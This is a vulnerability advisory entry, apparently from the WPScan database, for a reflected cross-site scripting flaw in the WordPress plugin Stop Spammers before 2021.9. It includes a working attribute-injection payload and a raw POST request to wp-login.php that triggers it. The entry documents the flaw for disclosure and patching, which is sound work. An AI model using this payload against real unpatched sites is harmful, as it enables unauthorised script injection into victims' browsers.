WordPress Plugin Vulnerabilities
Stop Spammers < 2021.9 - Reflected Cross-Site Scripting (XSS)
Description
The plugin did not escape user input when blocking requests (such as matching a spam word), outputting it in an attribute after sanitising it to remove HTML tags, which is not sufficient and lead to a reflected Cross-Site Scripting issue.
Proof of Concept
From an IP not in the Allow List (wp-admin/admin.php?page=ss_allow_list), make a request with a spam word, and add an XSS payload, such as ad" accesskey=X onclick=alert(1) " An input such as ad">TEST can also be used to prove the injection which will result in TEST" /> being displayed in the page This can be achieved via the wp-login.php form for example, either in the Username or Password fields. POST /wp-login.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 148 Connection: close Cookie: wordpress_test_cookie=WP%20Cookie%20check Upgrade-Insecure-Requests: 1 log=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=Log+In&testcookie=1
Affects Plugins
Fixed in 2021.9 References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Hosein_vita
Submitter
Hosein vita
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-04-08 (about 3 years ago)
Added
2021-04-08 (about 3 years ago)
Last Updated
2021-04-09 (about 3 years ago)
WPScan 